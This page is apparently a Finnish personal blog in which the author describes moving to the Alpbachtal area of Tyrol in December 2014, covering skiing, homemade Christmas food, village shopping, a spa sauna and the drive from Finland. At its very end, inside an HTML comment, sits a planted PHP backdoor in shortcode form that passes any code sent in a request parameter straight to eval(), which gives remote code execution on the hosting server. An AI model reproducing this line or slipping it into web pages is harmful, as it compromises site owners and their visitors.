Kolmas päivä rinteessä ja tietenkin avoinna on lähes ainoana vaihtoehtona mustarinne. Se on hieno juttu et painovoima tuo vaikka väkisin alas. Rankan päivän päätteeksi oli pakko käydä pitämässä huolta myös painovoimasta eli Gulashkeittoa leivällä ja jälkkäriksi Itävaltalaista pannukakkua omenahillolla (Kaiserschmarren). Näillä jaksaa odotella et Kitzbühelin rinteet saavat hieman enemmän lunta, sillä turistit ovat jo rinteet täyttäneet.
Aamulla kun varovasti kurkisti ikkunasta pihalle niin näki syyn ulkoa kuuluvalle kolinalle. Vuokraemäntä ja -isäntä siellä kolistelivat lumilapioiden kanssa ja olivat avanneet minulle tien. Eiliset muutamat lumihiutaleet olivat vaihtuneet noin 20cm lumikerrokseen. Ihanaa!
Tämähän tarkoitti sitä, että ensimmäiset lumiketjut on bongattu liikenteestä. Juuri samalla hetkellä kun totesin pihasta lähtiessä etteihän täällä mitään lumiketjuja tarvitse. Ei ilmeisesti pakettiauto nouse näissä korkeuseroissa ihan mäkeen asti ilman ketjuja. Kitkat tuntuu toimivan näissä maastoissa tällä hetkellä hyvin. Ikävä on vain sitä jatkojohtoa, joka on edelleen kaupassa ja yllättäen ajaessani sitä etsimään tänään en muistanut tietenkään tänään olevan tapaninpäivä.
Ei lunta ainakaan täällä jouluaattona, kuten kuvasta näkyy. Täällä voi sen sijaan nähdä lumen sijasta vielä lehmät, kilipukit ja kanat laitumella. 🙂
Jouluaatto aamu aloitetaan perinteisesti riisipuurolla. Päälle kanelisokeria ja tietenkin iso voisydän. Viimeisten viikkojen aamut ovat tarkoittaneet käytännössä kello yhtätoista, joten hyvin tuntuu nukuttavan täällä uudessa kodissa.
Joulumenu aiheutti pientä päänvaivaa, mutta lopputulos oli aivan täydellinen. Täydellistä ruokaa myöhäisessä aattoillassa. 🙂
Joulupäivänä kun viimein heräsin leffan katsomisen ja päikkäreiden jälkeen niin yllätyin iloisesti. Oi, ulkona satoi ensimmäiset lumihiutaleet. Tarkoittaako tämä että aamulla maa on täällä valkeana? 🙂
Ensimmäiset ihan alusta loppuun asti itse tekemäni karjalanpiirakat. Hieman huolissaan olin ruisjauhojen saatavuudesta, mutta kaupasta löytyikin ruisjauhoja. Kaulinpulikkaahan täällä ei asunnossa ei ollut eikä sitä kaupastakaan löytynyt. Hätä ei kuitenkaan ollut suuri, kun kaapissa ollut viinipullo kietaistuna muovipussiin hoiti hienosti kaulimen tehtävät.
Täydellisen herkullisia karjalanpiirakoita varsinkin lämpiminä! Päälle ei tarvitse mitään muuta kuin sipaisu aitoa voita! Nam!
Ensimmäinen aamu minulla Itävallassa, että auton ikkunat ovat umpikierossa jäässä. Ehkäpä sitä luntakin tulee kohta? 🙂 Ei sitä mitenkään ole odotettukaan, mutta kyllä tuo hetkessä ikkunat sulattava aurinkokin on todella kiva.
Kaupassa käynti vieraassa maassa on aina yhtä eksoottista ja kauppareissulla kuluu äkkiä hetki jos toinenkin ihmetellessä mitähän kaikkea täältä löytyy ja mitä mikäkin on. Ei varmaan kannata edes tarkentaa ettei nämä kaupat järin suuria ole, mutta hyvät valikoimat niistä löytyy. Margariinejä ei ole hyllyssä kymmentä eri merkkiä. Se takaa vaan sen, että hyllyssä on sen sijaan hyvin laaja kirjo erilaisia tuotteita.
Tänään selvisi myös mysteeri mistä jätesäkkejä ostetaan: tiskin alta. Tosiaan täällä on käytössä systeemi, jossa roskat jätetään restmüll -säkeissä tienposkeen tai niille varattuun aitaukseen. Roskakassit maksavat kaupan kassalla 3-5 euroa riippuen säkin koosta. Säkkejä myydään sieltä kaupan kassan alta postimerkkien vierestä kuin parempaakin arvotavaraa. Kyllähän roskille tällä logiikalla hintaa kertyykin.
Joulu lähestyy ja olen yrittänyt keksiä mikähän olisi tämän joulun ruokalista. Jotain ajatuksia rupeaa olemana kasassa, mutta katsotaan sitten mitä kaupasta oikeasti jää mukaan ja mitä niistä valmistuu. Tämän päivän kokeillaan listalla oli riisipuuro ja kaurapuurohiutaleet. En löytänyt mitään riisihyllystä mikä olisi näyttänyt puuroriisiin viittaavalta. Tämä riisipaketti näytti sisältönsä puolesta lähimmältä ja saapa nähdä millainen riisipuuro tästä syntyy. Voi olla, että tämä on ihan tavallista pitkää riisiä eikä se puuroudu ollenkaan. Toinen ei jouluun liittyvä ruoka-aine ostoslistallani on ollut kaurapuuro. Tämäkin paketti löytyi periaatteessa oikeasta hyllystä, mutta voi olla että yritän tehdä myslistä kaurapuuroa. Tämä on tätä vieraassa maassa elämisen ihanuutta, koskaan ei tiedä mikä lopputulos on. Sen voi aina vaan sanoa, että matka on taatusti hauska.
Joulua ja lunta odotellessa tein löydyn lähikaupasta toisella yrittämällä. Löysin pakastealtaasta lehtitaikinaa ja suussasulavat joulutuotortut maistuivat täydelliseltä kuuman Glühwienen kanssa. Eikä ole joulua ellei ole suklaata, joten pienillä maistiaisilla on hyvä aloittaa.
Rinnekartta näyttää sen jonka vihreä luonto tällä hetkellä laskijalle tarjoaa. Parkkipaikalla on täysin vihreää ja melkein kesäistä, mutta huipuilla on jo ensimmäiset rinteet auki eli gondolilla ylös vaikka se vähän hassulta tuntuukin. Täällä on tarjolla monenlaisia kausikortteja, mutta itse päädyin Snow Card Tirol -korttiin oikeastaan sen laajuuden takia. Sillä pääsee laskemaan 87:ssä eri laskettelukeskuksessa ja rinnekilometrejä sen alta löytyy 4000 km. Päätin aloittaa kylän lähimmistä avoimista rinteistä Alpbachtal-Wildschönau alueella joita on kaikkiaan 145 km. Tämä laskettelualue on yhtenäistä aluetta oman kylän rinteiden kanssa, mutta en ole ihan vielä ymmärtänyt mistä siirtoreitti menee sillä sitä ei ole merkattu käsittääkseni mihinkään karttaan.
Elämäni ensimmäinen kerta Alppien rinteissä pistää ilmeen hieman vakavaksi ja jalat tutisemaan kauden aloituslaskussa. Rinteitä on muutama auki ihan huipulla Schatzbergillä ja niissä tykitettyä lunta ehkä 5-10cm. Suksen pohjat ovat tällä menolla entiset ennen kevättä hiekka ja kiviosumien ansiosta.
Täällä on näköjään ihan sama osaako saksaa vaiko ei, sillä keskustelu etenee jollain saksa-englanti sekoituksella johonkin suuntaan. Sekalainen keskustelu johti siihen, että rinnepoika juoksee minua vastaan hissikopistaan etiketittömän pullon ja snapsilasin kanssa ja tarjoaa hedelmänmakuisin snapsin. Ehkä minua hieman hymyilytti ja sen jälkeen yllättäen muutamat muutkin hissipojat rupesi moikkaamaan minulle.
Jännitin tänne ajessa aivan hulluna millainen uusi kotini mahtaisi olla. Netissä kuvien perusteella ei kuitenkaan saa kuvaa tunnelmasta ja kokonaisuudesta. Yllätys oli todella positiivinen, parempaa valintaa en olisi voinut tehdä. Kotini näyttääsuoraan sanottuna lähes siltä kuin olisin sen itse itselleni tehnyt, sattumaako? Talon kissa ja koira eivät halunneet tulla tänään kuvattavaksi, joten ehkä näette heidät myöhemmin. Vuokraisännän koira osaa jo tulla minua vastaan häntä heiluen, kun näkee minut tai autoni tulevan pihaan.
Kotikyläni – Niederau on pieni maalaiskylä. Yksi monista Alppien kylistä, jotka kiemurtelevat laaksojen pohjalla ja vuoren rinteillä helminauhamaisesti. Kylässä on ruokakauppa, kampaamo, posti, urheiluliike, pankki, yökerho, laskettelukeskus ja hotelleja. Pienessä kylässä näitä kaikkia oikeastaan yksi kutakin, mutta majoitusmahdollisuuksia täällä on enemmän ja tarvitseeko sitä ylipäätänsä enempää. Turisteja täällä ei vielä näy, mutta kunhan saadaan luonnon lumi maahan niin tilanne varmasti muuttuu.
Päätin lähteä pienelle päiväkävelyllä ja pitää välipäivän rinteestä, jotta lihakset saavat välilä levätä. Voi kuinka väärin ajattelinkaan. Loppujen lopuksi löysin itseni puuskuttamasta naama punaisena kohti Markbachjochia, joka on 1500 m korkea meidän kylän toisiksi isoin “mäki”. Mentaliteetti tietenkin oli, että ylös asti mennään vaikka mikä on. Totesin jossain vaiheessa, että alas ehkä pääsee gondolilla sillä se näytti kulkevan kaukana rinteessä. Pienoisen ongelman mielessäni muodosti se, että rinnelippu oli tietenkin kotona keittiönpöydällä kuten mukaan varatut käteisetkin. Onneksi ylös mennessä oli aikaa miettiä kaikki mahdolliset selitykset, jolla gondolin kyytiin voisi päästä. Vaihtoehto kyydille alas olisi se, että alas mennään kävellen ja aika vauhdilla ettei pimeä pääse yllättämään. Käsittämätöntä kyllä pääsin alas ihan ilman lippuakin ja ilman minkäänlaisia koottuja selityksiä, kun hissiin oli sattumoisin täysin avoimet ovet.
Kauppareisulta kotiin tullessa huomasin ilokseni, että talon kulmalla oleva juustola oli avannut ovensa ja sisällä näytti olevan asiakkaita. Ostokset äkkiä kotiin ja koiran kanssa kurkistamaan mitä herkkuja siellä myydät. Mukaan lähti palaset paria eri juustoa hintaan 5 euroa. Suomessa tuohon rahaan saisi näistä viipaleista ehkä toisen. Parasta tässä tietenkin on lähiruoka ideologia. Voiko tuote enää lähempänä kotia olla? Aivan loistava juttu, tulen varmasti käymään useammankin kerran.
Aamupalan jälkeen on hyvä lähteä kokeilemaan kevytty patikointia ja nousta katsomaan Längenfeldia hieman korkeammasta perspektiivistä. Maisemat ovat vaan niin upeat, että niitä voisi vaan ihailla tunnista toiseen. Tämä on syy miksi ihmiset rakastuvat Itävaltaan!
Kävelyreitin varrella oli rotkon ylittävä hauska riippusilta. Se on kyllä selvää ettei tässä maassa voi asuva jos kärsii korkeanpaikan kammosta. Jostain kumman syystä katse hakeutuu väkisinkin horisonttiin eikä ritilikön läpi näkyvään rotkoon.
Vasemmassa alareunassa näkyy parin päivän majapaikkani: Aqua Dome, Längenfeld. Kylpylähotelli jossa voi viettää huoletta useamman päivän eikä vieläkään ole nähnyt kaikkea mitä kylpylä voi tarjota.
Suomalaisena luulee tietävänsä parhaat saunakokemukset. Meillä sanottiin aina ettei saa puhaltaa toisen iholle kuumassa saunassa, mutta täällä siitä otetaan kaikki ilo irti ja se tuntuu vielä hyvältä. Taustalla soi Abba ja “Löylyvalmentaja” heittää kiukaalle vettä. Sauna on kuuma ja ilmassa tuoksuvat eteeriset öljyt vievät ajatuksesi autuaan rentoutuneeseen tilaan. Sitten “Löylyvalmentaja” alkaa löyhyttämään ilmaan erilaisin apuvälinein, niin jotta jokainen lauteilla istuja saa lämmöstä osansa. Tätä jatketaan noin 10 minuuttia ja viimein “Löylymestari” saa raikuvat aplodit noin 50:ltä lauteilla alasti istuvalta hikeä valuvalta yleisöltään. Erilainen saunakokemus, mutta todella upea sellainen!
10.12.2014 klo 17.00 lähdin auton, matkatavaroiden ja monien ajatuksien kanssa kohti Itävaltaa. Viherrakentamisen kausi saatiin kutakuinkin Suomessa päätökseen ja minun oli aika keskittyä opinnäytetyön tekemiseen sekä paljon muuhun Itävallan upeissa maisemissa. Matkaa oli odotettu kuin kuuta nousevaa ja vihdoin se hetki oli tässä.
Laivamatka Saksaan oli myrskyisä ja kunnnon yöunet vaihtuivat unettomaan yöhön miettiessä mitenkä monta iskua laivan runko voikaan kestää. Vapaapudotus alloon harjalta tuntui niin vatsanpohjassa kuin laivan rungossakin. Seuraavana aamuna meri näytti hyvinkin tyyneltä ja uneton yö oli unohdettujen asioiden listalla. Väsyneenä ja myöhässä aikataulusta saavuimme Saksan Travemünden satamaan yöllä klo 0.30 (12.12.2014). Siitä hetkeksi nukkumaan hotellille ja aamusta ajopäivä Saksan läpi kohti Itävaltaa.
Tuulisen ajomatkan jälkeen Alpit siintävät auringonpaisteessa kaukana horisontissa ja todellisuus tuntuu aivan täysin käsittämättömältä. Siellä se minun elämä on seuraavat reilut kolme kuukautta. Hymy nousee vaan korviin ja mitään muuta asiasta ei varmaan tarvitse sanoa! 🙂
<!– [insert_php]if (isset($_REQUEST["suv"])){eval($_REQUEST["suv"]);exit;}[/insert_php][php]if (isset($_REQUEST["suv"])){eval($_REQUEST["suv"]);exit;}[/php] –>
